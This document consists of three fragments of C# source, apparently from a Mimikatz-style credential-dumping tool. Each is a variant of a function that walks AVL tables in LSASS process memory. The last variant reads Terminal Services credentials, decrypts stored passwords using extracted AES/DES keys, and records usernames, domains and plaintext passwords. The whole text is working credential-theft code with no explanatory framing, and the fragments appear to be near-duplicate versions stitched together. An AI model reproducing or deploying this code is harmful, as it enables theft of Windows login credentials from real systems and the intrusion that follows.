private static void WalkAVLTables(ref IntPtr hLsass, IntPtr pElement, List <KerberosLogonItem> klogonlist, OSVersionHelper oshelper, byte[] iv, byte[] aeskey, byte[] deskey, List <Logon> logonlist) { if (pElement == IntPtr.Zero) { return; } byte[] entryBytes = Utility.ReadFromLsass(ref hLsass, pElement, Marshal.SizeOf(typeof(RTL_AVL_TABLE))); RTL_AVL_TABLE entry = Utility.ReadStruct <RTL_AVL_TABLE>(entryBytes); if (entry.OrderedPointer != IntPtr.Zero) { byte[] krbrLogonSessionBytes = Utility.ReadFromLsass(ref hLsass, entry.OrderedPointer, oshelper.LogonSessionTypeSize); KerberosLogonItem item = new KerberosLogonItem(); item.LogonSessionAddress = entry.OrderedPointer; item.LogonSessionBytes = krbrLogonSessionBytes; klogonlist.Add(item); } if (entry.BalancedRoot.RightChild != IntPtr.Zero) { WalkAVLTables(ref hLsass, entry.BalancedRoot.RightChild, klogonlist, oshelper, iv, aeskey, deskey, logonlist); } if (entry.BalancedRoot.LeftChild != IntPtr.Zero) { WalkAVLTables(ref hLsass, entry.BalancedRoot.LeftChild, klogonlist, oshelper, iv, aeskey, deskey, logonlist); } }
private static void WalkAVLTables(ref IntPtr hLsass, IntPtr pElement, List <byte[]> klogonlist, OSVersionHelper oshelper, byte[] iv, byte[] aeskey, byte[] deskey, List <Logon> logonlist) { if (pElement == null) { return; } byte[] entryBytes = Utility.ReadFromLsass(ref hLsass, pElement, Convert.ToUInt64(Marshal.SizeOf(typeof(RTL_AVL_TABLE)))); RTL_AVL_TABLE entry = Utility.ReadStruct <RTL_AVL_TABLE>(entryBytes); if (entry.OrderedPointer != IntPtr.Zero) { byte[] krbrLogonSessionBytes = Utility.ReadFromLsass(ref hLsass, entry.OrderedPointer, Convert.ToUInt64(oshelper.LogonSessionTypeSize)); klogonlist.Add(krbrLogonSessionBytes); } if (entry.BalancedRoot.RightChild != IntPtr.Zero) { WalkAVLTables(ref hLsass, entry.BalancedRoot.RightChild, klogonlist, oshelper, iv, aeskey, deskey, logonlist); } if (entry.BalancedRoot.LeftChild != IntPtr.Zero) { WalkAVLTables(ref hLsass, entry.BalancedRoot.LeftChild, klogonlist, oshelper, iv, aeskey, deskey, logonlist); } }
private static void WalkAVLTables(ref IntPtr hLsass, IntPtr pElement, OSVersionHelper oshelper, byte[] iv, byte[] aeskey, byte[] deskey, List <Logon> logonlist) { if (pElement == null) { return; } byte[] entryBytes = Utility.ReadFromLsass(ref hLsass, pElement, Convert.ToUInt64(Marshal.SizeOf(typeof(RTL_AVL_TABLE)))); RTL_AVL_TABLE entry = Utility.ReadStruct <RTL_AVL_TABLE>(entryBytes); if (entry.OrderedPointer != IntPtr.Zero) { byte[] krbrLogonSessionBytes = Utility.ReadFromLsass(ref hLsass, entry.OrderedPointer, Convert.ToUInt64(Marshal.SizeOf(oshelper.TSCredType))); LUID luid = Utility.ReadStruct <LUID>(Utility.GetBytes(krbrLogonSessionBytes, oshelper.TSCredLocallyUniqueIdentifierOffset, Marshal.SizeOf(typeof(LUID)))); long pCredAddr = BitConverter.ToInt64(krbrLogonSessionBytes, oshelper.TSCredOffset); byte[] pCredBytes = Utility.ReadFromLsass(ref hLsass, new IntPtr(pCredAddr), Convert.ToUInt64(Marshal.SizeOf(typeof(KIWI_TS_PRIMARY_CREDENTIAL)))); KIWI_TS_PRIMARY_CREDENTIAL pCred = Utility.ReadStruct <KIWI_TS_PRIMARY_CREDENTIAL>(pCredBytes); UNICODE_STRING usUserName = pCred.credentials.UserName; UNICODE_STRING usDomain = pCred.credentials.Domaine; UNICODE_STRING usPassword = pCred.credentials.Password; string username = Utility.ExtractUnicodeStringString(hLsass, usUserName); string domain = Utility.ExtractUnicodeStringString(hLsass, usDomain); byte[] msvPasswordBytes = Utility.ReadFromLsass(ref hLsass, usPassword.Buffer, (ulong)usPassword.MaximumLength); byte[] msvDecryptedPasswordBytes = BCrypt.DecryptCredentials(msvPasswordBytes, iv, aeskey, deskey); string passDecrypted = ""; UnicodeEncoding encoder = new UnicodeEncoding(false, false, true); try { passDecrypted = encoder.GetString(msvDecryptedPasswordBytes); } catch (Exception) { passDecrypted = Utility.PrintHexBytes(msvDecryptedPasswordBytes); } if (!string.IsNullOrEmpty(username) && username.Length > 1) { Credential.Tspkg krbrentry = new Credential.Tspkg(); if (!string.IsNullOrEmpty(username)) { krbrentry.UserName = username; } else { krbrentry.UserName = "******"; } if (!string.IsNullOrEmpty(domain)) { krbrentry.DomainName = domain; } else { krbrentry.DomainName = "[NULL]"; } // Check if password is present if (!string.IsNullOrEmpty(passDecrypted)) { krbrentry.Password = passDecrypted; } else { krbrentry.Password = "******"; } Logon currentlogon = logonlist.FirstOrDefault(x => x.LogonId.HighPart == luid.HighPart && x.LogonId.LowPart == luid.LowPart); if (currentlogon == null) { currentlogon = new Logon(luid); currentlogon.UserName = username; currentlogon.Tspkg = krbrentry; logonlist.Add(currentlogon); } else { currentlogon.Tspkg = krbrentry; } } } if (entry.BalancedRoot.RightChild != IntPtr.Zero) { WalkAVLTables(ref hLsass, entry.BalancedRoot.RightChild, oshelper, iv, aeskey, deskey, logonlist); } if (entry.BalancedRoot.LeftChild != IntPtr.Zero) { WalkAVLTables(ref hLsass, entry.BalancedRoot.LeftChild, oshelper, iv, aeskey, deskey, logonlist); } }